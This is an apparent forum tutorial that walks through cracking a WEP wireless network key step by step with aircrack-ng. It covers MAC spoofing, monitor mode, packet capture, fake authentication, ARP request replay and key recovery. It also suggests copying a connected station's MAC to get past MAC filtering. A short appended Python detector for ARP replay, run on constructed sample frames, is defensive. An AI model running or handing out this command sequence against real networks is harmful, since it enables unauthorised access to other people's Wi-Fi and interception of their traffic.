What is WEP?
Wired Equivalent Privacy (WEP) is a security protocol for wireless networks that encrypts transmitted data. It's easy to configure. Without any security, your data can be intercepted without difficulty.
Please do not confuse this with WPA. WPA is Wi-Fi Protected Access, a security standard for wireless networks. This requires a password, NOT a key.
1) Can you even do it?
First we need to be sure your wireless card can support packet injection. I used my Acer Aspire 5920. It comes with an 802.11a/b/g WLAN wireless card. It can't do packet injection. Thus I purchased the Hawking HWUG1 wireless card. Hard to come by, but one of the best out there. Best Buy has them for $40, give or take.
2) Install the software
Some people like to use BackTrack Live OS, which to me is pointless unless you don't want to install Linux and use it as your everyday operating system. You need 2 things to do this: macchanger and aircrack-ng.
Commands:
Make yourself the root user:
[QUOTE]sudo -s[/QUOTE]
Install Aircrack
[QUOTE]apt-get install aircrack-ng[/QUOTE]
Install macchanger
[QUOTE]apt-get install macchanger[/QUOTE]
There! You have the 2 programs that make it easy to continue.
3) Verify you can use injection
Open the terminal, and type iwconfig. It will show you your network cards.

You will see I have 2 wireless cards, wlan0 and rausb0. wlan0 is the one that won't work, so we need to disable that; rausb0 is the wireless card I purchased.
Type the following command:
[QUOTE]aireplay-ng --test rausb0[/QUOTE]
That will show the following result.

If it doesn't, you need to get a wireless card that works.
4) Spoof MAC and put your wireless card into monitor mode
I will list the commands, and what they do. You don't NEED to spoof your MAC, but it sure makes it a lot easier to remember.
We don't need wlan0, so let's disable it.
[QUOTE]ifconfig wlan0 down[/QUOTE]
We need to disable rausb0 as well, so we can modify it.
[QUOTE]ifconfig rausb0 down[/QUOTE]
Change your MAC (can be whatever you want as long as it looks like ##:##:##:##:##:##)
[QUOTE]macchanger --mac 00:11:22:33:44:55 rausb0[/QUOTE]
The commands below are used for the Hawking wireless card only; I believe they enable the drivers for the wireless card.
[QUOTE]modprobe -r rt73
modprobe rt73[/QUOTE]
Bring up rausb0 for use
[QUOTE]ifconfig rausb0 up[/QUOTE]
Modify the bit rate of rausb0 to 1Mb/s
[QUOTE]iwconfig rausb0 rate 1M[/QUOTE]
Confirm the bit rate
[QUOTE]iwconfig rausb0[/QUOTE]
Enable rausb0 for use
[QUOTE]airmon-ng start rausb0[/QUOTE]
Here is a screenshot of me doing all of that (don't mind the typo)

You are now ready to begin!
5) Monitor the wireless networks around you, choose your target
Type the following command into your terminal
[QUOTE]airodump-ng rausb0[/QUOTE]
This will monitor the wireless networks around you, as well as the stations connected to them.

You will notice the command will display pretty much everything you need. We will attack 2WIRE (my wireless LAN). Notice it's WEP, and it's on channel 6. I have highlighted the BSSID.
NOTE: Looking at the screenshot, you will notice it shows the stations connected to BSSIDs. This is why MAC filtering is pointless: if they can connect and you can't, spoof your MAC to theirs, and chances are it will let you in. If the station's connected BSSID is blank, that means he's looking for or trying to connect to a BSSID, but has not yet.
6) Run Airodump-ng
Once you have selected your target, you can monitor the data packets it is sending out.
Type the below command into the terminal.
[QUOTE]airodump-ng -c 6 -w 2wire --bssid 00:12:88:FE:7A:21 rausb0[/QUOTE]
-c will specify the channel the BSSID is on; 2WIRE is on 6
-w will write the packet data to a file; I chose to name the file 2wire
--bssid will specify the BSSID you are trying to connect to.
NOTE: LEAVE THIS RUNNING! Open a new terminal tab, and sudo -s again as admin

Notice how the Data column says 0? It will climb to 5000 to 10000 packets. If you can't even hit 5000, then your signal isn't good enough. This may take time; it can take anywhere from 2 minutes to 30 minutes. Be patient.
7) Fake Authentication with Access Point
Type the below command in the terminal
[QUOTE]aireplay-ng -1 0 -a 00:12:88:FE:7A:21 -h 00:11:22:33:44:55 rausb0[/QUOTE]
-a forces attack mode
-h is the host, that is your MAC

The authentication must read successful in order for you to continue. I have had to run this command a few times to get it to be successful.
8) Run Aireplay with -3 (start aireplay-ng in ARP Request Replay Mode)
Type the below command into the terminal:
[QUOTE]aireplay-ng -3 -b 00:12:88:FE:7A:21 -h 00:11:22:33:44:55 rausb0[/QUOTE]
NOTE: Open a new tab again! Let this run as well!!

9) LAST STEP! Decrypt the packet data
If you go into the terminal and type "ls /home", you will see some .cap files. I named my log 2wire, thus it will be "2wire-01.cap".
Type the following command into the terminal:
[QUOTE]aircrack-ng -n 64 --bssid 00:12:88:FE:7A:21 2wire-01.cap[/QUOTE]
Hope it has enough data to decrypt. If not, it will say please wait and try later.

SUCCESS!
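
How the ARP request replay from step 8 looks from the network owner's side, as an added example that is not part of the original post: aireplay-ng -3 retransmits one captured encrypted frame over and over, so a single transmitter repeats the same 24-bit WEP IV and frame length at a high rate, while normal traffic uses a fresh IV per frame. The frame records, the third MAC address, the window and the threshold are constructed assumptions; timestamps are in milliseconds.

```python
from collections import defaultdict

def find_replay_sources(frames, window_ms=1000, threshold=50):
    """frames: iterable of (ts_ms, transmitter_mac, wep_iv_hex, frame_len).

    Returns {mac: peak} for every transmitter that sent one (IV, length)
    pair at least `threshold` times inside any `window_ms` span.
    """
    groups = defaultdict(list)
    for ts, mac, iv, length in frames:
        groups[(mac.lower(), iv.lower(), length)].append(ts)

    flagged = {}
    for (mac, _iv, _length), times in groups.items():
        times.sort()
        start = peak = 0
        for end, ts in enumerate(times):
            # Slide the left edge until the span fits in the window.
            while ts - times[start] > window_ms:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            flagged[mac] = max(flagged.get(mac, 0), peak)
    return flagged

def build_sample():
    """Constructed capture summary, not real traffic."""
    frames = []
    for i in range(400):
        # Replaying station: identical IV and length every 5 ms.
        frames.append((10_000 + 5 * i, "00:11:22:33:44:55", "a1b2c3", 68))
        # Access point answers each one with a fresh IV.
        frames.append((10_001 + 5 * i, "00:12:88:FE:7A:21",
                       f"{0x100000 + i:06x}", 68))
    for i in range(200):
        # Ordinary client (hypothetical MAC): new IV per frame.
        frames.append((100 * i, "00:aa:bb:cc:dd:01",
                       f"{0x200000 + i:06x}", 120))
    return frames

SAMPLE = build_sample()

if __name__ == "__main__":
    for mac, peak in find_replay_sources(SAMPLE).items():
        print(f"possible ARP replay from {mac}: "
              f"{peak} identical frames within 1 s")
```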